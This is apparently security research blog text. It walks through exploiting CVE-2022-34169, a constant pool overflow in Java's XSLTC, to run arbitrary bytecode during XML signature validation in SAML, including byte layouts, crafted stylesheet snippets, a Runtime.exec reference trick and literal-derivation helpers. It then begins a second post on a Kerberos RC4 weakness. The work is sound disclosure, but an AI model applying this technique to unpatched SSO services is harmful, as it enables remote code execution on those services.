SAML SSO logins work by exchanging XML documents between the application, known as service provider (SP), and the identity provider (IdP). When a user tries to log in to an SP, the service provider creates a SAML request. The IdP looks at the SAML request, tries to authenticate the user and sends a SAML response back to the SP. A successful response will contain information about the user, which the application can then use to grant access to its resources.


In the most widely used SAML flow (known as SP Redirect Bind / IdP POST Response) these documents are forwarded through the user's browser using HTTP redirects and POST requests. To protect against modification by the user, the security critical part of the SAML response (known as Assertion) has to be cryptographically signed by the IdP. In addition, the IdP might require SPs to also sign the SAML request to protect against impersonation attacks.

This means that both the IdP and the SP have to parse and verify XML signatures passed to them by a potential malicious actor. Why is this a problem? Let's take a closer look at the way XML signatures work:


XML Signatures


Most signature schemes operate on a raw byte stream and sign the data as seen on the wire. Instead, the XML signature standard (known as XMLDsig) tries to be robust against insignificant changes to the signed XML document. This means that changing whitespaces, line endings or comments in a signed document should not invalidate its signature. 


An XML signature consists of a special Signature element, an example of which is shown below:

<Signature>
  <SignedInfo>
    <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
    <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />
    <Reference URI="#signed-data">
       <Transforms>
       …
       </Transforms>
       <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />
       <DigestValue>9bc34549d565d9505b287de0cd20ac77be1d3f2c</DigestValue>
    </Reference>
  </SignedInfo>
  <SignatureValue>....</SignatureValue>
  <KeyInfo><X509Certificate>....</X509Certificate></KeyInfo>
</Signature>


  • The SignedInfo child contains CanonicalizationMethod and SignatureMethod elements as well as one or more Reference elements describing the integrity protected data.
  • KeyInfo describes the signer key and can contain a raw public key, a X509 certificate or just a key id.
  • SignatureValue contains the cryptographic signature (using SignatureMethod) of the SignedInfo element after it has been canonicalized using CanonicalizationMethod.


At this point, only the integrity of the SignedInfo element is protected. To understand how this protection is extended to the actual data, we need to take a look at the way Reference elements work: In theory the Reference URI attribute can either point to an external document (detached signature), an element embedded as a child (enveloping signature) or any element in the outer document (enveloped signature). In practice, most SAML implementations use enveloped signatures and the Reference URI will point to the signed element somewhere in the current document tree.


When a Reference is processed during verification or signing, the referenced content is passed through a chain of Transforms. XMLDsig supports a number of transforms, ranging from canonicalization and base64 decoding to XPath or even XSLT. Once all transforms have been processed, the resulting byte stream is passed into the cryptographic hash function specified with the DigestMethod element and the result is stored in DigestValue.

This way, as the whole Reference element is part of SignedInfo, its integrity protection gets extended to the referenced element as well. 


Validating an XML signature can therefore be split into two separate steps:

  • Reference Validation: Iterate through all embedded references and for each reference fetch the referenced data, pump it through the Transforms chain and calculate its hash digest. Compare the calculated Digest with the stored DigestValue and fail if they differ.

  • Signature Validation: First canonicalize the SignedInfo element using the specified CanonicalizationMethod algorithm. Calculate the signature of SignedInfo using the algorithm specified in SignatureMethod and the signer key described in KeyInfo. Compare the result with SignatureValue and fail if they differ.


Interestingly, the order of these two steps can be implementation specific. While the XMLDsig RFC lists Reference Validation as the first step, performing Signature Validation first can have security advantages as we will see later on.


Correctly validating XML signatures and making sure the data we care about is protected is very difficult in the context of SAML. This will be a topic for later blog posts, but at this point we want to focus on the reference validation step:


As part of this step, the application verifying a signature has to run attacker controlled transforms on attacker controlled input. Looking at the list of transformations supported by XMLDsig, one seems particularly interesting: XSLT. 


XSLT, which stands for Extensible Stylesheet Language Transformations, is a feature-rich XML based programming language designed for transforming XML documents. Embedding an XSLT transform in an XML signature means that the verifier has to run the XSLT program on the referenced XML data.


The code snippet below gives you an example of a simple XSLT transformation. When executed it fetches each <data> element stored inside <input>, grabs the first character of its content and returns it as part of its <output>. So <input><data>abc</data><data>def</data></input> would be transformed into <output><data>a</data><data>d</data></output>.

<Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
  <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns="http://www.w3.org/TR/xhtml1/strict" exclude-result-prefixes="foo"
   version="1.0">
   <xsl:output encoding="UTF-8" indent="no" method="xml" />
   <xsl:template match="/input">
        <output>
            <xsl:for-each select="data">
                <data><xsl:value-of select="substring(.,1,1)" /></data>
            </xsl:for-each>
        </output>
   </xsl:template>
 </xsl:stylesheet>
</Transform>


Exposing a fully-featured language runtime to an external attacker seems like a bad idea, so let's take a look at how this feature is implemented in Java’s OpenJDK.


XSLT in Java


Java’s main interface for working with XML signatures is the javax.xml.crypto.dsig.XMLSignature class (in the java.xml.crypto module) and its sign and validate methods. We are mostly interested in the validate method, which is shown below:


// https://github.com/openjdk/jdk/blob/master/src/java.xml.crypto/share/classes/org/jcp/xml/dsig/internal/dom/DOMXMLSignature.java
@Override
    public boolean validate(XMLValidateContext vc)
        throws XMLSignatureException
    {
        [..]
        // validate the signature
        boolean sigValidity = sv.validate(vc); (A)
        if (!sigValidity) {
            validationStatus = false;
            validated = true;
            return validationStatus;
        }

        // validate all References
        @SuppressWarnings("unchecked")
        List<Reference> refs = this.si.getReferences();
        boolean validateRefs = true;
        for (int i = 0, size = refs.size(); validateRefs && i < size; i++) {
            Reference ref = refs.get(i);
            boolean refValid = ref.validate(vc); (B)
            LOG.debug("Reference [{}] is valid: {}", ref.getURI(), refValid);
            validateRefs &= refValid;
        }
        if (!validateRefs) {
            LOG.debug("Couldn't validate the References");
            validationStatus = false;
            validated = true;
            return validationStatus;
        }
   [..]
   }


As we can see, the validate method first validates the signature of the SignedInfo element in (A) before validating all the references in (B).  This means that an attack against the XSLT runtime will require a valid signature for the SignedInfo element and we’ll discuss later how an attacker can bypass this requirement.


The call to ref.validate() in (B) ends up in the DOMReference.validate method shown below:

public boolean validate(XMLValidateContext validateContext)
        throws XMLSignatureException
    {
        if (validateContext == null) {
            throw new NullPointerException("validateContext cannot be null");
        }
        if (validated) {
            return validationStatus;
        }
        Data data = dereference(validateContext); (D)
        calcDigestValue = transform(data, validateContext); (E)

        [..]
        validationStatus = Arrays.equals(digestValue, calcDigestValue); (F)
        validated = true;
        return validationStatus;
    }




The code gets the referenced data in (D), transforms it in (E) and compares the digest of the result with the digest stored in the signature in (F). Most of the complexity is hidden behind the call to transform in (E) which loops through all Transform elements defined in the Reference and executes them.


As this is Java, we have to walk through a lot of indirection layers before we end up at the interesting parts. Take a look at the call stack below if you want to follow along and step through the code:


at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:584)
at com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl.newTransformer(TransformerFactoryImpl.java:818)
at com.sun.org.apache.xml.internal.security.transforms.implementations.TransformXSLT.enginePerformTransform(TransformXSLT.java:130)
at com.sun.org.apache.xml.internal.security.transforms.Transform.performTransform(Transform.java:316)
at org.jcp.xml.dsig.internal.dom.ApacheTransform.transformIt(ApacheTransform.java:188)
at org.jcp.xml.dsig.internal.dom.ApacheTransform.transform(ApacheTransform.java:124)
at org.jcp.xml.dsig.internal.dom.DOMTransform.transform(DOMTransform.java:173)
at org.jcp.xml.dsig.internal.dom.DOMReference.transform(DOMReference.java:457)
at org.jcp.xml.dsig.internal.dom.DOMReference.validate(DOMReference.java:387)
at org.jcp.xml.dsig.internal.dom.DOMXMLSignature.validate(DOMXMLSignature.java:281)


If we specify an XSLT transform and the org.jcp.xml.dsig.secureValidation property isn’t enabled (we’ll come back to this later), we will end up in the file src/java.xml/share/classes/com/sun/org/apache/xalan/internal/xsltc/trax/TransformerFactoryImpl.java, which is part of a module called XSLTC.


XSLTC, the XSLT compiler, is originally part of the Apache Xalan project. OpenJDK forked Xalan-J, a Java based XSLT runtime, to provide XSLT support as part of Java’s standard library. While the original Apache project has a number of features that are not supported in the OpenJDK fork, most of the core code is identical and CVE-2022-34169 affected both codebases. 


XSLTC is responsible for compiling XSLT stylesheets into Java classes to improve performance compared to a naive interpretation based approach. While this has advantages when repeatedly running the same stylesheet over large amounts of data, it is a somewhat surprising choice in the context of XML signature validation. Thinking about this from an attacker's perspective, we can now provide arbitrary inputs to a fully-featured JIT compiler. Talk about an unexpected attack surface! 


A bug in XSLTC

    /**
     * As Gregor Samsa awoke one morning from uneasy dreams he found himself
     * transformed in his bed into a gigantic insect. He was lying on his hard,
     * as it were armour plated, back, and if he lifted his head a little he
     * could see his big, brown belly divided into stiff, arched segments, on
     * top of which the bed quilt could hardly keep in position and was about
     * to slide off completely. His numerous legs, which were pitifully thin
     * compared to the rest of his bulk, waved helplessly before his eyes.
     * "What has happened to me?", he thought. It was no dream....
     */
    protected final static String DEFAULT_TRANSLET_NAME = "GregorSamsa";

Turns out that the author of this codebase was a Kafka fan. 


So what does this compilation process look like? XSLTC takes an XSLT stylesheet as input and returns a JIT'ed Java class, called a translet, as output. The JVM then loads this class, constructs it and the XSLT runtime executes the transformation via a JIT'ed method.


Java class files contain the JVM bytecode for all class methods, a so-called constant pool describing all constants used and other important runtime details such as the name of its super class or access flags. 


// https://docs.oracle.com/javase/specs/jvms/se18/html/jvms-4.html
ClassFile {
    u4             magic;
    u2             minor_version;
    u2             major_version;
    u2             constant_pool_count;
    cp_info        constant_pool[constant_pool_count-1]; // cp_info is a variable-sized object
    u2             access_flags;
    u2             this_class;
    u2             super_class;
    u2             interfaces_count;
    u2             interfaces[interfaces_count];
    u2             fields_count;
    field_info     fields[fields_count];
    u2             methods_count;
    method_info    methods[methods_count];
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}


XSLTC depends on the Apache Byte Code Engineering Library (BCEL) to dynamically create Java class files. As part of the compilation process, constants in the XSLT input such as Strings or Numbers get translated into Java constants, which are then stored in the constant pool. The following code snippet shows how an XSLT integer expression gets compiled: Small integers that fit into a byte or short are stored inline in bytecode using the bipush or sipush instructions. Larger ones are added to the constant pool using the cp.addInteger method:


// org/apache/xalan/xsltc/compiler/IntExpr.java
public void translate(ClassGenerator classGen, MethodGenerator methodGen) {
        ConstantPoolGen cpg = classGen.getConstantPool();
        InstructionList il = methodGen.getInstructionList();
        il.append(new PUSH(cpg, _value));
    }

// org/apache/bcel/internal/generic/PUSH.java
public PUSH(final ConstantPoolGen cp, final int value) {
        if ((value >= -1) && (value <= 5)) {
            instruction = InstructionConst.getInstruction(Const.ICONST_0 + value);
        } else if (Instruction.isValidByte(value)) {
            instruction = new BIPUSH((byte) value);
        } else if (Instruction.isValidShort(value)) {
            instruction = new SIPUSH((short) value);
        } else {
            instruction = new LDC(cp.addInteger(value));
        }
    }


The problem with this approach is that neither XSLTC nor BCEL correctly limits the size of the constant pool. As constant_pool_count, which describes the size of the constant pool, is only 2 bytes long, its maximum size is limited to 2**16 - 1 or 65535 entries. In practice even fewer entries are possible, because some constant types take up two entries. However, BCEL's internal constant pool representation uses a standard Java array for storing constants, and does not enforce any limit on its length.

When XSLTC processes a stylesheet that contains more constants than that, and BCEL's internal class representation is serialized to a class file at the end of the compilation process, the array length is truncated to a short, but the complete array is written out.

This means that constant_pool_count will now contain a small value and that parts of the attacker-controlled constant pool will get interpreted as the class fields following the constant pool, including method and attribute definitions. 
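
The truncation itself is simple enough to show standalone (this is just the arithmetic, not BCEL's serialization code):

/* A pool of 0x10703 constants serializes a constant_pool_count of 0x0703. */
#include <stdint.h>
#include <stdio.h>

int main(void) {
    uint32_t pool_entries = 0x10703;               /* actual array length */
    uint16_t serialized = (uint16_t)pool_entries;  /* what hits the wire  */
    printf("0x%x\n", serialized);                  /* prints 0x703        */
    return 0;
}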

Exploiting a constant pool overflow


To understand how we can exploit this, we first need to take a closer look at the content of the constant pool.  Each entry in the pool starts with a 1-byte tag describing the kind of constant, followed by the actual data. The table below shows an incomplete list of constant types supported by the JVM (see the official documentation for a complete list). No need to read through all of them but we will come back to this table a lot when walking through the exploit. 

CONSTANT_Utf8 (tag 1): variable-sized UTF-8 string value.

CONSTANT_Utf8_info {
    u1 tag;
    u2 length;
    u1 bytes[length];
}

CONSTANT_Integer (tag 3): 4-byte integer.

CONSTANT_Integer_info {
    u1 tag;
    u4 bytes;
}

CONSTANT_Float (tag 4): 4-byte float.

CONSTANT_Float_info {
    u1 tag;
    u4 bytes;
}

CONSTANT_Long (tag 5): 8-byte long.

CONSTANT_Long_info {
    u1 tag;
    u4 high_bytes;
    u4 low_bytes;
}

CONSTANT_Double (tag 6): 8-byte double.

CONSTANT_Double_info {
    u1 tag;
    u4 high_bytes;
    u4 low_bytes;
}

CONSTANT_Class (tag 7): reference to a class. Links to a Utf8 constant describing the name.

CONSTANT_Class_info {
    u1 tag;
    u2 name_index;
}

CONSTANT_String (tag 8): a JVM “String”. Links to a UTF8 constant.

CONSTANT_String_info {
    u1 tag;
    u2 string_index;
}

CONSTANT_Fieldref (tag 9), CONSTANT_Methodref (tag 10), CONSTANT_InterfaceMethodref (tag 11): reference to a class field or method. Links to a Class constant.

CONSTANT_Fieldref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_Methodref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_InterfaceMethodref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_NameAndType (tag 12): describes a field or method.

CONSTANT_NameAndType_info {
    u1 tag;
    u2 name_index;
    u2 descriptor_index;
}

CONSTANT_MethodHandle (tag 15): describes a method handle.

CONSTANT_MethodHandle_info {
    u1 tag;
    u1 reference_kind;
    u2 reference_index;
}

CONSTANT_MethodType (tag 16): describes a method type. Points to a UTF8 constant containing a method descriptor.

CONSTANT_MethodType_info {
    u1 tag;
    u2 descriptor_index;
}



A perfect constant type for exploiting CVE-2022-34169 would be dynamically sized and contain fully attacker-controlled content. Unfortunately, no such type exists. While CONSTANT_Utf8 is dynamically sized, its content isn’t a raw string representation but an encoding format the JVM calls “modified UTF-8”. This encoding introduces some significant restrictions on the data stored and rules out null bytes, making it mostly useless for corrupting class fields.


The next best thing we can get is a fixed-size constant type with full control over the content. CONSTANT_Long seems like an obvious candidate, but XSLTC never creates attacker-controlled long constants during the compilation process. Instead we can use large floating point literals to create CONSTANT_Double entries with (almost) fully controlled content. This gives us a nice primitive where we can corrupt class fields behind the constant pool with a byte pattern like 0x06 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0x06 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0x06 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ.
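
To see how a decimal literal in the stylesheet turns into eight controlled bytes, one can work backwards: pick the bytes, reinterpret them as an IEEE-754 double, and print the literal to embed. The following is a standalone sketch of that derivation, not tooling from the exploit:

/* Derive the XSLT double literal that serializes to a chosen 8-byte
 * pattern in a CONSTANT_Double entry (high_bytes first). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    /* The eight bytes we want behind the 0x06 tag, in big-endian order. */
    uint8_t wanted[8] = {0x00, 0x01, 0xCC, 0xCC, 0xDD, 0xDD, 0x00, 0x03};
    uint64_t bits = 0;
    for (int i = 0; i < 8; i++)
        bits = (bits << 8) | wanted[i];
    double d;
    memcpy(&d, &bits, sizeof(d));   /* reinterpret the bit pattern */
    /* 17 significant digits are enough for the value to round-trip;
     * this is the literal a generator would embed in e.g. ceiling(...). */
    printf("%.17g\n", d);
    return 0;
}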


Unfortunately, this primitive alone isn’t sufficient for crafting a useful class file due to the requirements of the fields right after the constant_pool:


    cp_info        constant_pool[constant_pool_count-1];
    u2             access_flags;
    u2             this_class;
    u2             super_class;


access_flags is a big endian mask of flags describing access permissions and properties of the class. 

While the JVM is happy to ignore unknown flag values, we need to avoid setting flags like ACC_INTERFACE (0x0200) or ACC_ABSTRACT (0x0400) that result in an unusable class. This means that we can’t use a CONSTANT_Double entry as our first out-of-bounds constant, as its tag byte of 0x06 will get interpreted as these flags.


this_class is an index into the constant pool and has to point to a CONSTANT_Class entry that describes the class defined with this file. Fortunately, neither the JVM nor XSLTC cares much about which class we pretend to be, so this value can point to almost any CONSTANT_Class entry that XSLTC ends up generating. (The only restriction is that it can’t be a part of a protected namespace like java.lang.)


super_class is another index to a CONSTANT_Class entry in the constant pool. While the JVM is happy with any class, XSLTC expects this to be a reference to the org.apache.xalan.xsltc.runtime.AbstractTranslet class, otherwise loading and initialization of the class file fails.


After a lot of trial and error I ended up with the following approach to meet these requirements:


CONST_STRING     CONST_DOUBLE
0x08 0x07 0x02   0x06 0xXX 0xXX 0x00 0x00 0x00 0x00 0xZZ 0xZZ

Interpreted as class fields (2 bytes each):
access_flags = 0x0807, this_class = 0x0206, super_class = 0xXXXX,
interfaces_count = 0x0000, fields_count = 0x0000, methods_count = 0xZZZZ


  1. We craft an XSLT input that results in 0x10703 constants in the pool. This will result in a truncated pool size of 0x703, and the start of the constant at index 0x703 (due to 0-based indexing) will be interpreted as access_flags.
  2. During compilation of the input, we trigger the addition of a new string constant when the pool has 0x702 constants. This will first create a CONSTANT_Utf8 entry at index 0x702 and a CONSTANT_String entry at 0x703. The String entry will reference the preceding Utf8 constant, so its value will be the tag byte 0x08 followed by the index 0x07 0x02. This results in a usable access_flags value of 0x0807.
  3. Add a CONSTANT_Double entry at index 0x704. Its 0x06 tag byte will be interpreted as part of the this_class field. The following 2 bytes can then be used to control the value of the super_class field. By setting the next 4 bytes to 0x00, we create empty interfaces and fields arrays, before setting the last two bytes to the number of methods we want to define.


The only remaining requirement is that we need to add a CONSTANT_Class entry at index 0x206 of the constant pool, which is relatively straightforward. 


The snippet below shows part of the generated XSLT input that will overwrite the first header fields. After filling the constant pool with a large number of string constants for the attribute fields and values, the CONST_STRING entry for the `jEb` element ends up at index 0x703. The XSLT function call to the `ceiling` function then triggers the addition of a controlled CONST_DOUBLE entry at index 0x704:


<jse jsf='jsg' … jDL='jDM' jDN='jDO' jDP='jDQ' jDR='jDS' jDT='jDU' jDV='jDW' jDX='jDY' jDZ='jEa' /><jEb />


<xsl:value-of select='ceiling(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008344026969402015)'/>


We have now constructed the initial header fields and are in the interesting part of the class file definition: the methods table. This is where all methods of a class and their bytecode are defined. After XSLTC generates a Java class, the XSLT runtime will load the class and instantiate an object, so the easiest way to achieve arbitrary code execution is to create a malicious constructor. Let’s take a look at the methods table to see how we can define a working constructor:


ClassFile {
    [...]
    u2             methods_count;
    method_info    methods[methods_count];
    [...]
}

method_info {
    u2             access_flags;
    u2             name_index;
    u2             descriptor_index;
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}

attribute_info {
    u2 attribute_name_index;
    u4 attribute_length;
    u1 info[attribute_length];
}

Code_attribute {
    u2 attribute_name_index;
    u4 attribute_length;
    u2 max_stack;
    u2 max_locals;
    u4 code_length;
    u1 code[code_length];
    u2 exception_table_length;
    {   u2 start_pc;
        u2 end_pc;
        u2 handler_pc;
        u2 catch_type;
    } exception_table[exception_table_length];
    u2 attributes_count;
    attribute_info attributes[attributes_count];
}



The methods table is a dynamically sized array of method_info structs. Each of these structs describes the access_flags of the method, an index into the constant table that points to its name (as a utf8 constant), and another index pointing to the method descriptor (another CONSTANT_Utf8). 

This is followed by the attributes table, a dynamically sized map from Utf8 keys stored in the constant table to dynamically sized values stored inline. Fortunately, the only attribute we need to provide is the Code attribute, which contains the actual bytecode of the method. 



Going back to our payload, we can see that the start of the methods table is aligned with the tag byte of the next entry in the constant pool table. This means that the 0x06 tag of a CONSTANT_Double will clobber the access_flag field of the first method, making it unusable for us. Instead we have to create two methods: The first one as a basic filler to get the alignment right, and the second one as the actual constructor. Fortunately, the JVM ignores unknown attributes, so we can use dynamically sized attribute values. The graphic below shows how we use a series of CONST_DOUBLE entries to create a constructor method with an almost fully controlled body.


CONST_DOUBLE: 0x06 0x01 0xXX 0xXX 0xYY 0xYY 0x00 0x01 0xZZ
CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x05 0x00 0x00 0x00 0x00
CONST_DOUBLE: 0x06 0x00 0x01 0xCC 0xCC 0xDD 0xDD 0x00 0x03
CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x00 0x04 0x00 0x00 0x00
CONST_DOUBLE: 0x06 0xCC 0xDD 0xZZ 0xZZ 0xZZ 0xZZ 0xAA 0xAA
CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA
CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA
CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA
CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

First Method Header
  access_flags 0x0601
  name_index   0xXXXX
  desc_index   0xYYYY
  attr_count   0x0001
  Attribute [0]
    name_index 0xZZ06
    length     0x00000005
    data       "\x00\x00\x00\x00\x06"

Second Method Header
  access_flags 0x0001
  name_index   0xCCCC -> <init>
  desc_index   0xDDDD -> ()V
  attr_count   0x0003
  Attribute [0]
    name_index 0x0600
    length     0x00000004
    data       "\x00\x00\x00\x06"
  Attribute [1]
    name_index 0xCCDD -> Code
    length     0xZZZZZZZZ
    data       PAYLOAD
  Attribute [2] ...



We still need to bypass one limitation: JVM bytecode does not work standalone; it references and relies on entries in the constant pool. Instantiating a class or calling a method requires a corresponding entry in the pool. This is a problem, as our bug doesn’t give us the ability to create fake constant pool entries, so we are limited to constants that XSLTC adds during compilation.


Luckily, there is a way to add arbitrary class and method references to the constant pool: Java’s XSLT runtime supports calling arbitrary Java methods. As this is clearly insecure, this functionality is protected by a runtime setting and always disabled during signature verification.

However, XSLTC will still process and compile these function calls when processing a stylesheet and the call will only be blocked during runtime (see the corresponding code in FunctionCall.java). This means that we can get references to all required methods and classes by adding a XSLT element like the one shown below:


<xsl:value-of select="rt:exec(rt:getRuntime(),'...')" xmlns:rt="java.lang.Runtime"/>



There are two final checks we need to bypass, before we end up with a working class file:

  • The JVM enforces that every constructor of a subclass calls a superclass constructor before returning. This check can be bypassed by never returning from our constructor, either by adding an endless loop at the end or by throwing an exception, which is the approach I used in my exploit proof-of-concept. A slightly more complex, but cleaner, approach is to add a reference to the AbstractTranslet constructor to the constant pool and call it. This is the approach used by thanat0s in their exploit writeup.

  • Finally, we need to skip over the rest of XSLTC’s output. This can be done by constructing a single large attribute with the right size as an element in the class attribute table.



Once we chain all of this together we end up with a signed XML document that can trigger the execution of arbitrary JVM bytecode during signature verification. I’ve skipped over some implementation details of this exploit, so if you want to reproduce this vulnerability please take a look at the heavily commented  proof-of-concept script.


Impact and Restrictions

In theory every unpatched Java application that processes XML signatures is vulnerable to this exploit. However, there are two important restrictions:


As references are only processed after the signature of the SignedInfo element is verified, applications can be protected based on their usage of the KeySelector class. Applications that use an allowlist of trusted keys in their KeySelector will be protected as long as these keys are not compromised. An example of this would be a single-tenant SAML SP configured with a single trusted IdP key. In practice, a lot of these applications are still vulnerable as they don’t use KeySelector directly and will instead enforce this restriction in their own application logic after an unrestricted signature validation. At this point the vulnerability has already been triggered. Multi-tenant SAML applications that support customer-provided Identity Providers, as most modern cloud SaaS do, are also not protected by this limitation.

SAML Identity Providers can only be attacked if they support (and verify) signed SAML requests.


Even without CVE-2022-34169, processing XSLT during signature verification can be easily abused as part of a DoS attack. For this reason, the property org.jcp.xml.dsig.secureValidation can be enabled to forbid XSLT transformation in XML signatures. Interestingly this property defaults to false for all JDK versions <17, if the application is not running under the Java security manager. As the Security Manager is rarely used for server side applications and JDK 17 was only released a year ago, we expect that a lot of applications are not protected by this. Limited testing of large java-based SSO providers confirmed this assumption. Another reason for a lack of widespread usage might be that org.jcp.xml.dsig.secureValidation also disables use of the SHA1 algorithm in newer JDK versions. As SHA1 is still widely used by enterprise customers, simply enabling the property without manually configuring a suitable jdk.xml.dsig.secureValidationPolicy might not be feasible.

Conclusion

XML signatures in general and SAML in particular offer a large and complex attack surface to external attackers. Even though Java offers configuration options that can be used to address this vulnerability, they are complex, might break real-world use cases and are off by default. 


Developers that rely on SAML should make sure they understand the risks associated with it and should reduce the attack surface as much as possible by disabling functionality that is not required for their use case. Additional defense-in-depth approaches like early validation of signing keys, an allow-list based approach to valid transformation chains and strict schema validation of SAML tickets can be used for further hardening.


RC4 Is Still Considered Harmful

By: Tim
27 October 2022 at 19:48

By James Forshaw, Project Zero


I've been spending a lot of time researching Windows authentication implementations, specifically Kerberos. In June 2022 I found an interesting issue (number 2310) with the handling of RC4 encryption that allowed you to authenticate as another user, either by interposing on the Kerberos network traffic to and from the KDC, or directly if the user was configured to disable typical pre-authentication requirements.


This blog post goes into more detail on how this vulnerability works and how I was able to exploit it with only a bare minimum of brute forcing required. Note, I'm not going to spend time fully explaining how Kerberos authentication works, there's plenty of resources online. For example this blog post by Steve Syfuhs who works at Microsoft is a good first start.

Background

Kerberos is a very old authentication protocol. The current version (v5) was described in RFC1510 back in 1993, although it was updated in RFC4120 in 2005. As Kerberos' core security concept is using encryption to prove knowledge of a user's credentials the design allows for negotiating the encryption and checksum algorithms that the client and server will use. 


For example, when sending the initial authentication service request (AS-REQ) to the Key Distribution Center (KDC), a client can specify a list of supported encryption algorithms, as predefined integer identifiers, as shown below in the snippet of the ASN.1 definition from RFC4120.


KDC-REQ-BODY    ::= SEQUENCE {

...

    etype    [8] SEQUENCE OF Int32 -- EncryptionType

                                   -- in preference order --,

...

}


When the server receives the request it checks its list of supported encryption types and the ones the user's account supports (which is based on what keys the user has configured) and then will typically choose the one the client most preferred. The selected algorithm is then used for anything requiring encryption, such as generating session keys or the EncryptedData structure as shown below:


EncryptedData   ::= SEQUENCE {

        etype   [0] Int32 -- EncryptionType --,

        kvno    [1] UInt32 OPTIONAL,

        cipher  [2] OCTET STRING -- ciphertext

}


The KDC will send back an authentication service reply (AS-REP) structure containing the user's Ticket Granting Ticket (TGT) and an EncryptedData structure which contains the session key necessary to use the TGT to request service tickets. The user can then use their known key which corresponds to the requested encryption algorithm to decrypt the session key and complete the authentication process.


Diagram showing the basic Kerberos authentication flow, requesting an AES key type.

This flexibility in selecting an encryption algorithm is both a blessing and a curse. In the original implementations of Kerberos only DES encryption was supported, which by modern standards is far too weak. Because of the flexibility developers were able to add support for AES through RFC3962 which is supported by all modern versions of Windows. This can then be negotiated between client and server to use the best algorithm both support. However, unless weak algorithms are explicitly disabled there's nothing stopping a malicious client or server from downgrading the encryption algorithm in use and trying to break Kerberos using cryptographic attacks.


Modern versions of Windows have started to disable DES as a supported encryption algorithm, preferring AES. However, there's another encryption algorithm which Windows supports which is still enabled by default, RC4. This algorithm was used in Kerberos by Microsoft for Windows 2000, although its documentation was in draft form until RFC4757 was released in 2006. 


The RC4 stream cipher has many substantial weaknesses, but when it was introduced it was still considered a better option than DES which has been shown to be sufficiently vulnerable to hardware cracking such as the EFF's "Deep Crack". Using RC4 also had the advantage that it was relatively easy to operate in a reduced key size mode to satisfy US export requirements of cryptographic systems. 


If you read the RFC for the implementation of RC4 in Kerberos, you'll notice it doesn't use the stream cipher as is. Instead it puts in place various protections to guard against common cryptographic attacks:

  • The encrypted data is protected by a keyed MD5 HMAC hash to prevent tampering which is trivial with a simple stream cipher such as RC4. The hashed data includes a randomly generated 8-byte "confounder" so that the hash is randomized even for the same plain text.

  • The key used for the encryption is derived from the hash and a base key. This, combined with the confounder makes it almost certain the same key is never reused for the encryption.

  • The base key is not the user's key, but instead is derived from a MD5 HMAC keyed with the user's key over a 4 byte message type value. For example the message type is different for the AS-REQ and the AS-REP structures. This prevents an attacker using Kerberos as an encryption oracle and reusing existing encrypted data in unrelated parts of the protocol.
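
Putting these protections together, here's a minimal Python sketch of the RFC 4757 construction; this is not Microsoft's code, just the steps above in executable form, with RC4 implemented inline since modern crypto libraries have removed it:

import hmac, os
from hashlib import md5

def rc4(key: bytes, data: bytes) -> bytes:
    # Textbook RC4 key scheduling plus keystream generation.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def rc4_hmac_encrypt(key: bytes, msg_type: int, plaintext: bytes) -> bytes:
    # Base key derived from the user key and the 4-byte message type.
    k1 = hmac.new(key, msg_type.to_bytes(4, 'little'), md5).digest()
    data = os.urandom(8) + plaintext               # random 8-byte confounder
    checksum = hmac.new(k1, data, md5).digest()    # keyed MD5 HMAC over data
    k3 = hmac.new(k1, checksum, md5).digest()      # per-message RC4 key
    return checksum + rc4(k3, data)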


Many of the known weaknesses of RC4 are related to gathering a significant quantity of ciphertext encrypted with a known key. Due to the design of the RC4-HMAC algorithm and the general functional principles of Kerberos this is not really a significant concern. However, the biggest weakness of RC4 as defined by Microsoft for Kerberos is not so much the algorithm, but the generation of the user's key from their password. 


As already mentioned Kerberos was introduced in Windows 2000 to replace the existing NTLM authentication process used from NT 3.1. However, there was a problem of migrating existing users to the new authentication protocol. In general the KDC doesn't store a user's password, instead it stores a hashed form of that password. For NTLM this hash was generated from the Unicode password using a single pass of the MD4 algorithm. Therefore to make an easy upgrade path Microsoft specified that the RC4-HMAC Kerberos key was this same hash value.
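
In code the key derivation is a one-liner; note that MD4 is absent from some newer OpenSSL builds, in which case hashlib.new('md4') raises ValueError:

import hashlib

def rc4_hmac_key(password: str) -> bytes:
    # The RC4-HMAC key is the NT hash: one unsalted MD4 pass over the
    # UTF-16LE encoded password.
    return hashlib.new('md4', password.encode('utf-16le')).digest()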


